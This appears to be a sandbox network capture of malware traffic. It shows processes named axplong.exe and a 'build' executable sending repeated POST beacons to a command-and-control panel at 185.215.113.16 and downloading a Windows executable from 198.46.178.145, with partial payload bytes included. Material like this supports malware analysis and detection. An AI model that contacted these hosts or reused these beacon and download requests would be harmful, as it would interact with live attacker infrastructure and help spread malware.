Jul 26, 2024 12:57:34.912992001 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:35.163952112 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.6	60818	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:35.279119015 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:36.023889065 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:35 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:36.025043011 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:36.334032059 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.6	60819	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:36.467056036 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:37.275916100 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:37.276741982 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:37.533778906 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.6	60822	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:37.662167072 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:38.447453022 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:38.448508978 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:38.708005905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:38 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.6	60824	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:38.825697899 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:39.594906092 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:39.595582008 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:39.849438906 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.6	60825	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:39.973567009 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:40.729517937 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:40.731966972 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:41.044859886 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.6	60826	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:41.153392076 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:41.903424978 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:41.904118061 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:42.154577017 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.6	60828	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:42.280354977 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:43.022701979 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:43.025783062 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:43.270880938 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.6	60830	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:43.393383026 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:44.163523912 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:44.164355993 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:44.413899899 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.6	60832	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:44.529786110 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:45.278594971 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:45.279392004 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:45.527192116 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.6	60833	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:45.642880917 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:46.384879112 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:46.385679960 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:46.631437063 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.6	60835	185.215.113.16	80	6432	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:46.747028112 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:47.491573095 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:47.492186069 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Jul 26, 2024 12:57:47.749099970 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.6	60836	198.46.178.145	80	2260	C:\Users\user\AppData\Local\Temp\1000020001\build_2024-07-25_20-56.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:47.840015888 CEST	223	OUT	GET /7847438767.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36 Host: 198.46.178.145 Cache-Control: no-cache
Jul 26, 2024 12:57:48.364026070 CEST	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Fri, 26 Jul 2024 10:30:50 GMT Accept-Ranges: bytes ETag: "dab2e2e246dfda1:0" Server: Microsoft-IIS/10.0 Date: Fri, 26 Jul 2024 10:57:48 GMT Content-Length: 12016128 Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 36 34 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 c9 72 a3 66 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 c2 8b 00 00 94 2b 00 00 00 00 00 a0 d0 8b 00 00 